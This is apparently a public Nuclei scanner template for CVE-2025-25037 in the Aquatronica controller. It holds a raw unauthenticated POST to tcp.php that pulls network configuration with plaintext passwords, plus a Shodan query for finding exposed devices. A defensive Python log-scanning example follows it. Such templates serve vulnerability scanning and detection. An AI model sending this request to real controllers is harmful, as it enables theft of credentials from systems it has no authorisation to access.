Aquatronica Controller System firmware 5.1.6 and earlier and web interface 2.0 and earlier contain an information disclosure vulnerability: the tcp.php endpoint can be accessed without authentication, which lets remote attackers retrieve sensitive configuration data, including plaintext credentials. Exploitation requires no authentication.
PoC code [public]
id: CVE-2025-25037

info:
  name: Aquatronica Controller System <= 5.1.6 - Information Disclosure
  author: s4e-io
  severity: high
  description: |
    Aquatronica Controller System firmware 5.1.6 and earlier and web interface 2.0 and earlier contain an information disclosure vulnerability caused by unauthenticated access to tcp.php endpoint, letting remote attackers retrieve sensitive configuration data including plaintext credentials, exploit requires no authentication.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
    - https://www.exploit-db.com/exploits/52028
    - https://vulncheck.com/advisories/aquatronica-controller-system-credential-leak
    - https://nvd.nist.gov/vuln/detail/CVE-2025-25037
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H
    cve-id: CVE-2025-25037
    cwe-id: CWE-200
    epss-score: 0.01173
    epss-percentile: 0.78047
  metadata:
    verified: true
    max-request: 1
    vendor: aquatronica
    product: controller
    shodan-query: html:"aquatronica"
  tags: cve,cve2025,aquatronica,info-leak,vkev,vuln

http:
  - raw:
      - |
        POST /tcp.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "WEB_PASSWORD"
          - "pwd=\""
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d8617903f42ca3d87d929ee96f4c58cba5c24643078c37cbfa6eeb91fb6029cb022100f504c7922ef2994584dddcfe78b2c72fa5846dc1b6b98468d8914e6221c81c1e:922c64590222798bb761d5b6d8e72950
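
For defenders, an added example (not part of the template or the vendor's code) that reviews web access logs for successful POST requests to tcp.php from outside the management network. The combined log format, the MGMT_NETS range, and the sample lines are assumptions constructed for illustration; standard access logs do not record the POST body, so the check keys on method, path, and status.

```python
import ipaddress
import re
from collections import Counter

# Assumption: a reverse proxy in front of the controller writes combined-format logs.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Assumption: networks that are allowed to manage the controller.
MGMT_NETS = [ipaddress.ip_network("192.168.10.0/24")]

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = """\
192.168.10.5 - - [01/Jan/2025:10:00:00 +0000] "POST /tcp.php HTTP/1.1" 200 812
203.0.113.7 - - [01/Jan/2025:10:02:11 +0000] "POST /tcp.php HTTP/1.1" 200 1450
203.0.113.7 - - [01/Jan/2025:10:02:12 +0000] "GET /index.php HTTP/1.1" 200 5120
198.51.100.23 - - [01/Jan/2025:10:05:40 +0000] "POST /tcp.php?x=1 HTTP/1.1" 200 1450
198.51.100.23 - - [01/Jan/2025:10:05:41 +0000] "POST /tcp.php HTTP/1.1" 403 120
not a log line
"""

def is_mgmt(addr):
    """True if addr parses as an IP inside an allowed management network."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # unparsable source is treated as untrusted
    return any(ip in net for net in MGMT_NETS)

def find_exposed_tcp_php(log_text):
    """Return (source, timestamp) per 200-status POST to /tcp.php from outside MGMT_NETS."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path = m["target"].split("?", 1)[0]  # ignore any query string
        if (m["method"] == "POST" and path == "/tcp.php"
                and m["status"] == "200" and not is_mgmt(m["src"])):
            hits.append((m["src"], m["ts"]))
    return hits

def sources(hits):
    """Count hits per source address for triage."""
    return Counter(src for src, _ in hits)

if __name__ == "__main__":
    for src, n in sources(find_exposed_tcp_php(SAMPLE_LOG)).items():
        print(f"{src}: {n} successful POST(s) to /tcp.php from outside MGMT_NETS")
```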